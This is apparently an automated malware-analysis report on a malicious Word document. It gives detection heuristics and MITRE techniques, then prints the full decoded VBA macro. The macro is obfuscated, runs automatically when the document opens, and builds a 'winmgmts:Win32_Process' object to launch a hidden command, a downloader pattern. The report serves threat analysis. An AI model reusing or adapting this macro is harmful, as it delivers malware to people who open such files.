MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'Document_open' macro is present and exhibits obfuscation, indicating an attempt to hide malicious activity. The presence of 'GetObject' and 'p-code auto-exec with execution tokens' heuristics, along with ClamAV detection as a downloader, strongly suggests the macro's purpose is to download and execute a secondary payload. No specific family could be identified due to the generic nature of the obfuscation and lack of network indicators.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7469762-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469762-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Loop Set Awrkzofjdwi = GetObject(Ifixlbcogm) Ksgkdieuey = 234 + 423 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox" Private Sub Document_open() Vsxcsqthpsv = 234 + 423 -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7699 bytes |
SHA-256: d0844ef7b32133ef07fde84d5acd81b4b90e55e7250312c6bd74e6c9fcd45973 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
191 of 322 identifiers look randomly generated (e.g. 'Htvjucopvovvk') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zjvhrbpst"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vsxcsqthpsv = 234 + 423
Do While Ulhnztvlka = 1
Gwngbesmxjx = 3 * Yhzjjyiv
Pyrazmdlrk = ("Accusantium fugiat facilis commodi.")
For Ufboncinko = Amvbbcetqj To Jesatyfkn
Tiulgmccale = ("Adipisci alias ipsam.")
Qbjpftvkhte = 223
Next
Iumicznybt = Ygnhxwfefkr
Loop
Bsszujwlwp
Elbmdkymoc = 234 + 423
Do While Bzylxlobrkv = 1
Gbabwvha = 3 * Vimzgrkdekdx
Evnnjrup = ("Dolorem dolore corrupti doloribus quia qui.")
For Wjykrgmmtf = Kmhkghqq To Ozwbitqqzg
Cxszlyyq = ("Dolorum officia ex.")
Ybkbgylnz = 223
Next
Nuyopyswdgw = Kjrgvsrgfh
Loop
End Sub
Attribute VB_Name = "Qfwdvbgu"
Attribute VB_Base = "0{6040592D-7473-4FA1-A6DF-0842EDC07B88}{B609B1DD-DA11-4B56-9C5F-3FCF55B119A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pnzbzthe"
Function Meqzuwbavz()
Wfibprxaq = 234 + 423
Do While Nrycciltbbod = 1
Acqckyhcjbmo = 3 * Affvsliykg
Vdceicvio = ("Mollitia et repudiandae non.")
For Yftklhxqn = Tvwslakb To Mddezetkty
Yhpybxqnqb = ("Ullam inventore rerum.")
Jhipqvymwwlc = 223
Next
Lddfudeiw = Mznlftly
Loop
Jtzutbmrwixdv = Zjvhrbpst.Pkcrbfruxqqk
Avzrjevtuhn = 234 + 423
Do While Egxuonuvwh = 1
Hqllvyalrbwp = 3 * Ddfcbmrib
Pjgoueou = ("Lester")
For Njiyingt = Hjjkqptfrc To Hkgpuwwwivp
Uxdszlpztsf = ("Tenetur est exercitationem veniam modi consectetur consequatur et qui quo.")
Xfkicteybxstt = 223
Next
Gbmuhtwsqnsri = Sapxzrlzsvy
Loop
Vvsrfpwhqplea = Jtzutbmrwixdv + Qfwdvbgu.Tjsfwgoqave + Qfwdvbgu.Jficvhxaze + Qfwdvbgu.Eegbgwkm
Hzmadwle = 234 + 423
Do While Yxkucxbyeabn = 1
Kaykhwxn = 3 * Nkfnvvzidhy
Lvpfnnsbt = ("Harum soluta commodi.")
For Qcxbxkvlwt = Sncjasknbnun To Qkzjpugtwtxy
Mnamfdwrlesi = ("Explicabo ut sunt est sint unde molestiae.")
Kciklftklnd = 223
Next
Zqjlbhrbon = Lvzzuqglp
Loop
Tqralznxyvlm = Vvsrfpwhqplea + Qfwdvbgu.Tacswkkfl + Qfwdvbgu.Fuwkkodvb.Tag
Nvoqwrhvd = 234 + 423
Do While Magnjdknxvq = 1
Fxevkerkxghj = 3 * Ttkbelqjbtlg
Nplxaukz = ("Minus mollitia et.")
For Kyadouydhj = Ntmjdwvlkezo To Vkjhjugyr
Muhuhyvlub = ("Quaerat perspiciatis vel eum veniam totam.")
Qqodbbgzmh = 223
Next
Ntaawmpcgyqbo = Gdcbgdzt
Loop
Meqzuwbavz = Pdjuarjmpsw + Tqralznxyvlm + Pdjuarjmpsw
Iaksnxnfhszrx = 234 + 423
Do While Ugrllztrbs = 1
Qaqsidjt = 3 * Svrmifznysf
Qmhdyoijzvtwf = ("Ipsam molestiae sit suscipit.")
For Rnnkqhov = Qosnuayzaafaa To Mdtaxpdpy
Euzrcqneiz = ("Tempora reiciendis rerum illo.")
Fvvweqvqncfee = 223
Next
Vjnzuqjwdaix = Vcewhnfcsyz
Loop
End Function
Function Bsszujwlwp()
Whupiiumtthh = 234 + 423
Do While Rdplwuce = 1
Idieaejun = 3 * Fwkyqksgkncj
Xmcmwpsl = ("Laborum molestiae.")
For Fzqmpkmul = Hfnfkjxltg To Edrhiqtyt
Trugraah = ("Ralph")
Nphpgmgvauam = 223
Next
Ixdddrkszb = Pcfksyuoqnk
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Bfhcxbxio = 234 + 423
Do While Wtvyxxvtacda = 1
Hxswohpjjch = 3 * Wlgzwdjfhbg
Gwzbxeqppd = ("Voluptate similique sapiente maiores.")
For Zkenjsqdky = Dhxhizvlldas To Fddxhhbnw
Rxjqhbhoe = ("Natus ullam et.")
Hihqhsawjld = 223
Next
Mzmraspledq = Udctefjpwv
Loop
Xshokoctxdop = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Zjvhrbpst.Pkcrbfruxqqk + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
Qhdhcfmpesnw = 234 + 423
Do While Yvynddxkdtcqw = 1
Qtqnvivbd = 3 * Gwmljsqs
Etpdxfekfli = ("Est nihil impedit.")
For Oywisqcuua = Bxsjkaezolaak To Rqybtjmy
Jybnvksngv = ("Elisa")
Auldxvcxwx = 223
Next
Ldvzinpzfxa = Lsbinecu
Loop
Ifixlbcogm = Join(Xshokoctxdop, "")
Qxfmmbcnz = 234 + 423
Do While Wihziddzmh = 1
Wlvovqgusngiq = 3 * Calizgioknfo
Tvxyyjaqng = ("Doloribus accusamus dolores distinctio.")
For Gqiczjekbzaz = Nwlaqbbkysij To Tlmelgzrgiov
Iuuyhgvdfmpv = ("Loretta")
Sqtqrkqpmwnls = 223
Next
Cmvrgceykcl = Fzpqodzpoxd
Loop
Set Awrkzofjdwi = GetObject(Ifixlbcogm)
Ksgkdieuey = 234 + 423
Do While Hmhyvrom = 1
Vytewcna = 3 * Jhcgsshg
Hjkrkxzkr = ("A aut quidem.")
For Apkxiqzmbhet = Ajbfcjhensl To Tyddiyji
Ikbiuhzdqlak = ("Voluptas.")
Fpxlvcrmuofnx = 223
Next
Upiissubanxnp = Bjlextay
Loop
Zauvksyutms = Ifixlbcogm + Qfwdvbgu.Ufdftudwj.ControlTipText + Qfwdvbgu.Ohpgknfpqtfc.ControlTipText
Usxprgrtqh = 234 + 423
Do While Axcdxzkymoh = 1
Heeemjtst = 3 * Hmorrktyjirmt
Ouqzfkrkjbno = ("Sapiente.")
For Wxgbfvllthbuj = Psloruycuqmqb To Dwpanklknuk
Jxlbuoti = ("Sint et quis quae non nulla ullam.")
Ncxvmltfjfddf = 223
Next
Jleixtgrw = Fkwmlhbwcypoy
Loop
Xeawxzmnyjbbu = Zauvksyutms + Zjvhrbpst.Pkcrbfruxqqk
Drgxgkxrrxd = 234 + 423
Do While Htvjucopvovvk = 1
Kujogmaswkjvl = 3 * Ewahitmgcm
Ickbvpagwnpkj = ("Veniam sapiente aut cum aut dolorum autem consequatur harum.")
For Yylgdqlj = Dndyohbymspl To Gktnrgpybsn
Gejwtlgsbwh = ("Dolorum est quia officia quia ducimus aliquam maiores veritatis.")
Omwoknpwz = 223
Next
Ystffmklgpvtd = Adveoleksdbmi
Loop
Set Bsszujwlwp = GetObject(Xeawxzmnyjbbu)
Cvqnarvfg = 234 + 423
Do While Cdzoscqdzz = 1
Pzwzeydhv = 3 * Fgogrhnjc
Szlpdpogt = ("Placeat consequuntur.")
For Pbndrrhdrn = Uhdvzwlppukgx To Vnsphavrnsn
Cztrqbrhzupkh = ("Qui quibusdam sint.")
Uqhgdblqyyvx = 223
Next
Pclgpnqbsqv = Vscfzjcww
Loop
Bsszujwlwp.XSize = False
Rtwiquvvizuah = 234 + 423
Do While Zzskzbpaycaw = 1
Bimjygyeqsc = 3 * Eybswklw
Chwbtxgpxyfgr = ("Roberto")
For Imuvjzinakbw = Mktdjjbc To Hjdfnvxht
Xrbnzutvqrb = ("Modi excepturi.")
Lomdiyqfip = 223
Next
Vcaentcipotsp = Hgnnfnsuzju
Loop
Bsszujwlwp.YSize = False
Amglweltwv = 234 + 423
Do While Rzzfnwsz = 1
Kjycbvhyizk = 3 * Ptxvrykuu
Kpmoyyqkzjbx = ("Sed sed vel occaecati impedit aut earum iure.")
For Dqmymytcujlq = Abwquerl To Zkiaovnwkboi
Hqaiuccixpjym = ("Ut.")
Hcrhtycq = 223
Next
Zwpfynsdbjd = Rgqqmtrqic
Loop
Do While Awrkzofjdwi.Create(KSNNSN & Meqzuwbavz, Tultfjihlr, Bsszujwlwp, Ggpmpnipwvhl)
Loop
Xvideayuc = 234 + 423
Do While Btucdtvq = 1
Paptqonnnfa = 3 * Cyqcqzeunyf
Rnwhqizsiv = ("Facilis sit nam.")
For Nmkhpzabds = Qersucbjzf To Qgprawtd
Dntmxyfshzjk = ("Dolorum aliquam numquam debitis iure esse.")
Rhxgtjliqk = 223
Next
Jibgyapybd = Ecegxwqgp
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.